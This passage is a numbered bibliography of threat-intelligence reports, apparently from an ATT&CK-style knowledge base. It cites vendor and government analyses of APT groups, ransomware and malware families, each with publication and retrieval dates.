  19. FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
  20. NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
  21. Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.
  22. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
  23. Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.
  24. Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.
  25. FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.
  26. Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020.
  27. FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020.
  28. Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.
  29. CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020.
  30. Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.
  31. FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.
  32. Savelesky, K., et al. (2019, July 23). ABADBABE 8BADFOOD: Discovering BADHATCH and a Detailed Look at FIN8's Tooling. Retrieved September 8, 2021.
  33. Vrabie, V., et al. (2021, March 10). FIN8 Returns with Improved BADHATCH Toolkit. Retrieved September 8, 2021.
  34. Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.
  35. Bar, T., Conant, S. (2017, October 20). BadPatch. Retrieved November 13, 2018.
  36. Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.
  37. Cybereason Nocturnus. (2020, July 16). A BAZAR OF TRICKS: FOLLOWING TEAM9’S DEVELOPMENT CYCLES. Retrieved November 18, 2020.
  38. Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.
  39. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
  40. Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.
  41. Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.
  42. Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021.
  43. Raghuprasad, C . (2022, May 11). Bitter APT adds Bangladesh to their targets. Retrieved June 1, 2022.
  44. Dela Paz, R. (2016, October 21). BITTER: a targeted attack against Pakistan. Retrieved June 1, 2022.
  45. F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
  46. MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021.
  47. US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020.
  48. Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021.
  49. MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
  50. Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.
  51. Harbison, M. and Renals, P. (2022, July 5). When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors. Retrieved February 1, 2023.
  52. Kenefick, I. et al. (2022, October 12). Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike. Retrieved February 6, 2023.
  53. FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.
  54. Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.
  55. Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.
  56. Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023.
  57. Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.
  58. Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.
  59. Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020.
  60. Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.
  61. Grunzweig, J.. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.
  62. Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021.
  63. Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.
  64. Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.
  65. Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.
  66. Jansen, W . (2021, January 12). Abusing cloud services to fly under the radar. Retrieved January 19, 2021.
  67. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
  68. ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.
  69. Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.
  70. F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.
  71. Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.
  72. Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.
  73. Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.
  74. Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.
  75. Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021.
  76. Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.
  77. GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.
  78. Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.
  79. Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.
  80. Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.
  81. CISA. (2020, October 29). Malware Analysis Report (AR20-303A). Retrieved December 9, 2020.
  82. Uptycs Threat Research Team. (2021, January 12). Confucius APT deploys Warzone RAT. Retrieved December 17, 2021.
  83. Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.
  84. F-Secure Labs. (2014, July). COSMICDUKE Cosmu with a twist of MiniDuke. Retrieved July 3, 2014.
  85. F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.
  86. Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.
  87. Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.
  88. Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020.
  89. Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.
  90. NCSC. (2022, February 23). Cyclops Blink Malware Analysis Report. Retrieved March 3, 2022.
  91. Haquebord, F. et al. (2022, March 17). Cyclops Blink Sets Sights on Asus Routers. Retrieved March 17, 2022.
  92. Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020.
  93. Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020.
  94. SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 2019/11/19
  95. Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.
  96. Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.
  97. Secureworks Counter Threat Unit Research Team. (2022, August 17). DarkTortilla Malware Analysis. Retrieved November 3, 2022.
  98. Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.
  99. Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
  100. McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.
  101. Neeamni, D., Rubinfeld, A.. (2021, July 1). Diavol - A New Ransomware Used By Wizard Spider?. Retrieved November 12, 2021.
  102. Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.
  103. Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.
  104. TheWover. (2019, May 9). donut. Retrieved March 25, 2022.
  105. ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.
  106. ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
  107. Slepogin, N. (2017, May 25). Dridex: A History of Evolution. Retrieved May 31, 2019.
  108. Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021.
  109. NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
  110. ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.
  111. Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.
  112. hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020.
  113. Bichet, J. (2020, November 12). Egregor – Prolock: Fraternal Twins ?. Retrieved January 6, 2021.
  114. Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.
  115. Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.
  116. Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.
  117. Binary Defense. (n.d.). Emotet Evolves With new Wi-Fi Spreader. Retrieved September 8, 2023.
  118. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
  119. Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.
  120. Kaspersky Lab's Global Research & Analysis Team. (2014, August 06). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroboros. Retrieved November 7, 2018.
  121. Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.
  122. Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.
  123. ANSSI. (2021, January 27). SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS. Retrieved March 30, 2021.
  124. Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.
  125. Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.
  126. Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.
  127. Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.
  128. Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.
  129. Ta, V., et al. (2022, August 8). FIN13: A Cybercriminal Threat Actor Focused on Mexico. Retrieved February 9, 2023.
  130. Sygnia Incident Response Team. (2022, January 5). TG2003: ELEPHANT BEETLE UNCOVERING AN ORGANIZED FINANCIAL-THEFT OPERATION. Retrieved February 9, 2023.
  131. Vengerik, B. et al.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved December 17, 2018.
  132. Vengerik, B. & Dennesen, K.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved January 15, 2019.
  133. Martin Zugec. (2021, July 27). Deep Dive Into a FIN8 Attack - A Forensic Investigation. Retrieved September 1, 2021.
  134. Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.
  135. Hada, H. (2021, December 28). Flagpro The new malware used by BlackTech. Retrieved March 25, 2022.
  136. Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.
  137. Ramin Nafisi. (2021, September 27). FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor. Retrieved October 4, 2021.
  138. Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.
  139. Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
  140. Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.
  141. Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.
  142. Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.
  143. CERT-EE. (2021, January 27). Gamaredon Infection: From Dropper to Entry. Retrieved February 17, 2022.
  144. Unit 42. (2022, February 3). Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.
  145. ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.
  146. Dupuy, T. and Faou, M. (2021, June). Gelsemium. Retrieved November 30, 2021.
  147. Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.
  148. Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018.
  149. Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020.
  150. Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
  151. Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021.
  152. Abramov, D. (2020, April 13). Grandoreiro Malware Now Targeting Banks in Spain. Retrieved November 12, 2020.
  153. ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.
  154. Mercer, W., Rascagneres, P. (2018, April 26). GravityRAT - The Two-Year Evolution Of An APT Targeting India. Retrieved May 16, 2018.
  155. Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved July 16, 2021.
  156. Duncan, B. (2020, April 3). GuLoader: Malspam Campaign Installing NetWire RAT. Retrieved January 7, 2021.
  157. Salem, E. (2021, April 19). Dancing With Shellcodes: Cracking the latest version of Guloader. Retrieved July 7, 2021.
  158. MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.
  159. FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.
  160. Patil, S. and Williams, M.. (2019, June 5). Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities. Retrieved June 20, 2019.
  161. Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
  162. Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.
  163. Malwarebytes Threat Intelligence Team. (2020, June 4). New LNK attack tied to Higaisa APT discovered. Retrieved March 2, 2021.
  164. Singh, S. Singh, A. (2020, June 11). The Return on the Higaisa APT. Retrieved March 2, 2021.
  165. Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.
  166. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.
  167. Shelmire, A.. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.
  168. Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.
  169. CrowdStrike. (2022, May). ICEAPPLE: A NOVEL INTERNET INFORMATION SERVICES (IIS) POST-EXPLOITATION FRAMEWORK. Retrieved June 27, 2022.
  170. Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020.
  171. GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020.
  172. Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020.
  173. Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.
  174. Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.
  175. Moran, N., & Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]. Retrieved November 12, 2014.
  176. Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019.
  177. ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.
  178. Lee, B, et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018.
  179. Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
  180. Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.
  181. Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.
  182. MSTIC. (2021, December 6). NICKEL targeting government organizations across Latin America and Europe. Retrieved March 18, 2022.
  183. Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.
  184. Patrick Wardle. (2017, January 1). Mac Malware of 2016. Retrieved September 21, 2018.
  185. An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.
  186. Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.
  187. Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021.
  188. Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
  189. Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.
  190. Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022.
  191. Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.
  192. Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.
  193. Pradhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022.
  194. Cherepanov, Anton. (2019, November 10). ESETresearch discovered a trojanized IDA Pro installer. Retrieved March 2, 2022.
  195. Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022.
  196. Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020.
  197. Muhammad, I., Unterbrink, H.. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021.
  1. Raggi, M. Schwarz, D.. (2019, August 1). LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards. Retrieved February 25, 2021.
  2. Lechtik, M, and etl. (2021, July 14). LuminousMoth APT: Sweeping attacks for the chosen few. Retrieved October 20, 2022.
  3. ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.
  4. The Cylance Threat Research Team. (2017, March 22). El Machete's Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.
  5. kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries — HpReact campaign. Retrieved November 20, 2020.
  6. Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.
  7. Ehrlich, A., et al. (2022, September). THE MYSTERY OF METADOR | AN UNATTRIBUTED THREAT HIDING IN TELCOS, ISPS, AND UNIVERSITIES. Retrieved January 23, 2023.
  8. Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.
  9. DFIR Report. (2022, March 21). APT35 Automates Initial Access Using ProxyShell. Retrieved May 25, 2022.
  10. DFIR Report. (2021, November 15). Exchange Exploit Leads to Domain Wide Ransomware. Retrieved January 5, 2023.
  11. GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.
  12. Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020.
  13. Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.
  14. Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.
  15. SentinelLabs. (2022, September 22). Metador Technical Appendix. Retrieved April 4, 2023.
  16. Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.
  17. ESET Research. (2019, October 3). Casbaneiro: peculiarities of this banking Trojan that affects Brazil and Mexico. Retrieved September 23, 2021.
  18. Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018.
  19. Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018.
  20. ClearSky Cyber Security . (2021, August). New Iranian Espionage Campaign By “Siamesekitten” - Lyceum. Retrieved June 6, 2022.
  21. Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.
  22. Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.
  23. Chen, Joey. (2022, June 9). Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years. Retrieved July 14, 2022.
  24. Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.
  25. FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.
  26. ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.
  27. Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.
  28. Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.
  29. Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.
  30. Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.
  31. Roccia, T., Seret, T., Fokker, J. (2021, March 16). Technical Analysis of Operation Dianxun. Retrieved April 13, 2021.
  32. Thomas, C. (n.d.). Mythc Documentation. Retrieved March 25, 2022.
  33. Lambert, T. (2020, January 29). Intro to Netwire. Retrieved January 7, 2021.
  34. Proofpoint. (2020, December 2). Geofenced NetWire Campaigns. Retrieved January 7, 2021.
  35. McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: “Night Dragon”. Retrieved February 19, 2018.
  36. Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.
  37. Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.
  38. Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.
  39. Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.
  40. Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.
  41. Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.
  42. Bromiley, M., et al.. (2019, July 18). Hard Pass: Declining APT34’s Invite to Join Their Professional Network. Retrieved August 26, 2019.
  43. Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.
  44. Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.
  45. Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.
  46. Cybereason Nocturnus. (2022, May 4). Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques. Retrieved September 22, 2022.
  47. Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.
  48. Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.
  49. Symantec Security Response Attack Investigation Team. (2018, April 23). Orangeworm: Indicators of Compromise. Retrieved July 8, 2018.
  50. Magisa, L. (2020, November 27). New MacOS Backdoor Connected to OceanLotus Surfaces. Retrieved December 2, 2020.
  51. Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022.
  52. Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.
  53. Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.
  54. Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022.
  55. Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.
  56. Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.
  57. Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022.
  58. Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves . Retrieved April 9, 2021.
  59. hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020.
  60. Nettitude. (2018, July 23). Python Server for PoshC2. Retrieved April 23, 2019.
  61. Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019.
  62. Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.
